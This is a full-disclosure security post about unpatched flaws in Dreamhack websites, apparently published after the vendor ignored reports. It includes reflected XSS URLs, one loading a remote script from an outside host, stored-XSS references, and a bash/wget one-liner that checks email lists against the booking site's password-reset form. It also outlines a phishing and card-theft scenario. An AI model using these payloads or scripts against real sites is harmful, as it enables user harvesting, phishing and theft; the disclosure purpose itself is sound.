Hi guys! After various months persuading the guys at Dreamhack to fix a series of issues in their websites without success I have decided to publish the vulnerabilities in the hope the comunity will be aware of them an avoid them. The date was chosen because today it's the opening of the Dreamhack Summer edition. For those of you not knowing Dreamhack is the biggest Lan Party in the world holding the World record of individual devices connected to the network. Going a little back forward some time ago I found two blind SQL injections on the ticket vending site. These were fixed promptly, I suppose because of the severity of them. By the end of november I had found most of the issues disclosed on this e-mail, but despite notifying them repeatedly they haven't fixed them nor shown any willingness to do so hence this publication. The issues cover mainly XSS injections and user enumerations. For those with less knowledge, an XSS injection is an attack where HTML code is injected in the target page, this is dangerous since arbitrary javascript code can be run then to completely modify the web page or to steal authentication data from unprotected cookies. An user enumeration is an attack where the attacker can know which users are on the system and which aren't. In this particular case we care about the attacker knowing which of the e-mails from a list have been registered and which aren't by seeing the responses the form gives on each case. After this explanation, let's start with the attacks: XSS in http://dreamhack.tv It's possible to abuse the search field to inject arbitrary code in the webpage since entities aren't scaped. Here are two examples http://www.dreamhack.tv/?s=%3Cscript%3Ealert%28%27aaaa%27%29;%3C/script%3E http://www.dreamhack.tv/?s=%3Cscript%20src=%22http://klondike.es/d.js%22%3E%3C/script%3E the last one was used to show the severity of the issue to Robert Ohlén, Dreamhack CEO. Despite this the issue remains unfixed to date. Permanent XSS in https://crew.dreamhack.se It's possible to abuse the address profile field (and maybe others) to inject arbitrary code, an example can be found in https://crew.dreamhack.se/users/eviltons.htm (you'll need to be registrered on the system to see it). This is very dangerous since these can't be filtered by browsers. Permanent XSS in https://dreamhack.netadmin.se/cw/main/home.aspx This is an internal portal where users can see statistics on their traffic and compete for achievements, the users with more achievements are marked as so. This is basically a showcase of netadmin's traffic analysis stuff. This system had (and may still have) a permanent XSS injection in the nick field used for registering which could even affect the whole system if the unescaped code is shown in the top users. Since this network is closed, the an image can be found at http://img94.imageshack.us/img94/4499/jvl.png User enumeration in http://bokning.dreamhack.se/ There is also a user enumeration on the forgot password field in the booking system where tickets are bought. This can be used to guess which users are registered either to send them more spam or to make a combined attack using the previous XSS or other fishing methods. In the web there are two of these attacks: The first one (and the simplest to exploit) is at http://bokning.dreamhack.se/?p=forgot_pass Below is a simple bash script that will filter the e-mails from a list that are not registered. while read i; do e="$(echo $i|sed -e 's/+/%2B/g' -e 's/@/%40/g')"; wget http://bokning.dreamhack.se/admin/admin.php --referer="http://bokning.dreamhack.se/?p=forgot_pass" -q --post-data="action=forgot_password&p=users&email=$e" -O- | tee lol.html | fgrep "Kunde inte skicka lösenord. Emailen fanns inte." > /dev/null || echo $i; done A similar attack can be exploited on http://bokning.dreamhack.se/?p=register in this case e.mails would be sent to the users not registered on the system. Finally it is possible to enumerate the users on the system since the sequence numbers used for id are easy to guess, see http://bokning.dreamhack.se/index.php?p=profile&id=1 (this parameter is usually increased by one and no data is shown if the user is not in the database for example: http://bokning.dreamhack.se/index.php?p=profile&id=63377 http://bokning.dreamhack.se/index.php?p=profile&id=63378 and http://bokning.dreamhack.se/index.php?p=profile&id=63379 or an invalid user http://bokning.dreamhack.se/index.php?p=profile&id=200000 This attack isn't that serious though and I didn't care about writting a better PoC. So many may ask if I can provide a practical usage case of these attacks. I certainly can, the attacker would use any of the e-mail enumeration attacks (probably the forgoten password one) to filter his e-mail lists making a new list of users interested in Dreamhack. After some time the attacker could then send phisin e-mails offering discount tickets to these users with a link to one of the XSS affected sites which could then be used to either steal his Credit Card information or do fraudulent operations by selling non existent tickets. There are of course a few good practices that can be followed to protect yourself from some of these attacks. The first on is not following any link to the affected sites to prevent XSS loads from acting. The second is using tagged e-mails (if you e-mail supports them) when you register in a web so user enumerations are harder to do, for example you could register as nick+tag@example.com Little more to say for now. See ya! Klondike